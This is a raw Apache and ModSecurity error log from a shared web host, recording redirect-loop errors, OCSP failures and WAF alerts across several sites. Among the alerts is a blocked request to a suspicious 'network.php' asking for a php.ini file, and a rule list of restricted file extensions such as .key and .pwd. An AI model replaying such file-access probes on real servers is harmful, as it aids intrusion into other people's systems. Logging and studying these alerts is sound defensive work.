[Tue May 12 06:39:06.641875 2026] [core:error] [pid 1825287:tid 1825317] [client 172.212.136.43:35924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:08.021641 2026] [core:error] [pid 1820198:tid 1820207] [client 172.212.136.43:29739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:08.021666 2026] [core:error] [pid 1820198:tid 1820207] [client 172.212.136.43:29739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:10.463198 2026] [core:error] [pid 1820198:tid 1820223] [client 172.212.136.43:35959] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:10.463226 2026] [core:error] [pid 1820198:tid 1820223] [client 172.212.136.43:35959] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:11.170351 2026] [core:error] [pid 1825287:tid 1825329] [client 172.212.136.43:28721] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:11.170389 2026] [core:error] [pid 1825287:tid 1825329] [client 172.212.136.43:28721] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:12.408727 2026] [core:error] [pid 1820198:tid 1820211] [client 172.212.136.43:10727] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:12.408761 2026] [core:error] [pid 1820198:tid 1820211] [client 172.212.136.43:10727] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:13.071730 2026] [core:error] [pid 1825287:tid 1825323] [client 172.212.136.43:39487] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:13.071767 2026] [core:error] [pid 1825287:tid 1825323] [client 172.212.136.43:39487] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:13.740533 2026] [core:error] [pid 1825179:tid 1825209] [client 172.212.136.43:10713] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:13.740562 2026] [core:error] [pid 1825179:tid 1825209] [client 172.212.136.43:10713] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:14.544167 2026] [core:error] [pid 1825287:tid 1825309] [client 172.212.136.43:10711] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:14.544203 2026] [core:error] [pid 1825287:tid 1825309] [client 172.212.136.43:10711] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:15.432443 2026] [core:error] [pid 1825179:tid 1825208] [client 172.212.136.43:10544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:15.432469 2026] [core:error] [pid 1825179:tid 1825208] [client 172.212.136.43:10544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:16.316484 2026] [core:error] [pid 1825287:tid 1825308] [client 172.212.136.43:10504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:16.316525 2026] [core:error] [pid 1825287:tid 1825308] [client 172.212.136.43:10504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:18.064567 2026] [core:error] [pid 1825179:tid 1825219] [client 172.212.136.43:11097] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:18.064600 2026] [core:error] [pid 1825179:tid 1825219] [client 172.212.136.43:11097] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:18.775994 2026] [core:error] [pid 1842385:tid 1842395] [client 172.212.136.43:56509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:18.776030 2026] [core:error] [pid 1842385:tid 1842395] [client 172.212.136.43:56509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:37.909313 2026] [security2:error] [pid 1825179:tid 1825221] [client 150.109.46.88:53726] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKvCdr1yOh9Tvizezi0eAAAAFc"]
[Tue May 12 06:41:02.411588 2026] [security2:error] [pid 1808852:tid 1808870] [client 44.195.145.102:38422] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/https:/www.piregwan-genesis.com/https:/piregwan-genesis.com/liens/addictiontreatments101.com"] [unique_id "agKvXhfeipD4uoG21FpHeQAAAA8"]
[Tue May 12 06:41:02.411978 2026] [security2:error] [pid 1808852:tid 1808870] [client 44.195.145.102:38422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/https:/www.piregwan-genesis.com/https:/piregwan-genesis.com/liens/addictiontreatments101.com"] [unique_id "agKvXhfeipD4uoG21FpHeQAAAA8"]
[Tue May 12 06:41:02.412237 2026] [security2:error] [pid 1808852:tid 1808870] [client 44.195.145.102:38422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/https:/www.piregwan-genesis.com/https:/piregwan-genesis.com/liens/addictiontreatments101.com"] [unique_id "agKvXhfeipD4uoG21FpHeQAAAA8"]
[Tue May 12 06:41:12.149835 2026] [security2:error] [pid 1844863:tid 1844874] [client 139.155.134.17:49106] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.culturesvoile.com"] [uri "/"] [unique_id "agKvaPaAnTZtx1_H_wzNawAAAUU"], referer: http://www.culturesvoile.com
[Tue May 12 06:41:19.660059 2026] [security2:error] [pid 1825179:tid 1825197] [client 43.135.144.126:56362] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/mixeur/"] [unique_id "agKvb9r1yOh9Tvizezi02wAAAEA"]
[Tue May 12 06:41:26.290005 2026] [authz_core:error] [pid 1844863:tid 1844890] [client 216.73.216.110:51780] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/lang/error_log
[Tue May 12 06:41:53.070688 2026] [security2:error] [pid 1820198:tid 1820208] [client 43.156.66.8:55622] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agKvkc1tk6y7yBJLpJpL6AAAAIg"]
[Tue May 12 06:42:54.690765 2026] [security2:error] [pid 1825287:tid 1825319] [client 43.163.107.243:60040] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/"] [unique_id "agKvzggpmE1yW0glLdhDgQAAAM4"]
[Tue May 12 06:42:58.207334 2026] [security2:error] [pid 1820198:tid 1820220] [client 43.163.107.243:35862] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agKv0s1tk6y7yBJLpJpMEwAAAJQ"], referer: http://www.habilis.space
[Tue May 12 06:43:08.482668 2026] [security2:error] [pid 1825179:tid 1825207] [client 171.22.133.67:57463] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: ac54256302a2627f3e32eb5942267b83||1778562774||1778562414"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKv3Nr1yOh9Tvizezi1SwAAAEk"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 06:43:08.482904 2026] [security2:error] [pid 1825179:tid 1825207] [client 171.22.133.67:57463] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKv3Nr1yOh9Tvizezi1SwAAAEk"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 06:43:08.483121 2026] [security2:error] [pid 1825179:tid 1825207] [client 171.22.133.67:57463] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKv3Nr1yOh9Tvizezi1SwAAAEk"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 06:43:24.747619 2026] [security2:error] [pid 1825179:tid 1825203] [client 49.51.141.76:59346] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/informatique/realisations/nenuphar/"] [unique_id "agKv7Nr1yOh9Tvizezi1ggAAAEU"]
[Tue May 12 06:43:32.862951 2026] [ssl:error] [pid 1825287:tid 1825320] (EAI 2)Name or service not known: [client 172.225.189.233:12289] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:43:32.862981 2026] [ssl:error] [pid 1825287:tid 1825320] AH01941: stapling_renew_response: responder error
[Tue May 12 06:44:18.880150 2026] [security2:error] [pid 1844863:tid 1844875] [client 216.73.216.110:60134] ModSecurity: Warning. Matched phrase "etc/php.ini" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/php.ini found within ARGS:filesrc: /opt/cpanel/ea-php71/root/etc/php.ini.rpmsave"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKwIvaAnTZtx1_H_wzOYAAAAUY"]
[Tue May 12 06:44:18.880851 2026] [security2:error] [pid 1844863:tid 1844875] [client 216.73.216.110:60134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKwIvaAnTZtx1_H_wzOYAAAAUY"]
[Tue May 12 06:44:18.972554 2026] [security2:error] [pid 1844863:tid 1844875] [client 216.73.216.110:60134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKwIvaAnTZtx1_H_wzOYAAAAUY"]
[Tue May 12 06:44:37.377921 2026] [ssl:error] [pid 1825287:tid 1825330] (EAI 2)Name or service not known: [client 66.249.75.38:52399] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 06:44:37.377965 2026] [ssl:error] [pid 1825287:tid 1825330] AH01941: stapling_renew_response: responder error
[Tue May 12 06:44:43.511308 2026] [security2:error] [pid 1825179:tid 1825204] [client 89.187.168.211:51324] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d8075fd9c0a11514ca345cef068604ad||1778562882||1778562522"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwO9r1yOh9Tvizezi19wAAAEY"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:43.511574 2026] [security2:error] [pid 1825179:tid 1825204] [client 89.187.168.211:51324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwO9r1yOh9Tvizezi19wAAAEY"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:43.511774 2026] [security2:error] [pid 1825179:tid 1825204] [client 89.187.168.211:51324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwO9r1yOh9Tvizezi19wAAAEY"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:43.780380 2026] [security2:error] [pid 1820198:tid 1820223] [client 89.187.168.211:51328] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d8075fd9c0a11514ca345cef068604ad||1778562882||1778562522"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwO81tk6y7yBJLpJpM8AAAAJc"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:43.780603 2026] [security2:error] [pid 1820198:tid 1820223] [client 89.187.168.211:51328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwO81tk6y7yBJLpJpM8AAAAJc"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:43.780855 2026] [security2:error] [pid 1820198:tid 1820223] [client 89.187.168.211:51328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwO81tk6y7yBJLpJpM8AAAAJc"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:44.072158 2026] [security2:error] [pid 1844863:tid 1844879] [client 89.187.168.211:51334] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d8075fd9c0a11514ca345cef068604ad||1778562882||1778562522"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwPPaAnTZtx1_H_wzOhAAAAUo"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:44.072422 2026] [security2:error] [pid 1844863:tid 1844879] [client 89.187.168.211:51334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwPPaAnTZtx1_H_wzOhAAAAUo"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:44.072633 2026] [security2:error] [pid 1844863:tid 1844879] [client 89.187.168.211:51334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwPPaAnTZtx1_H_wzOhAAAAUo"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:44.329959 2026] [security2:error] [pid 1842385:tid 1842409] [client 89.187.168.211:51340] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d8075fd9c0a11514ca345cef068604ad||1778562882||1778562522"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwPBs7kySIUZ3ORnI8wAAAARI"], referer: http://la-grande-fabrique.com/?page_id=1928
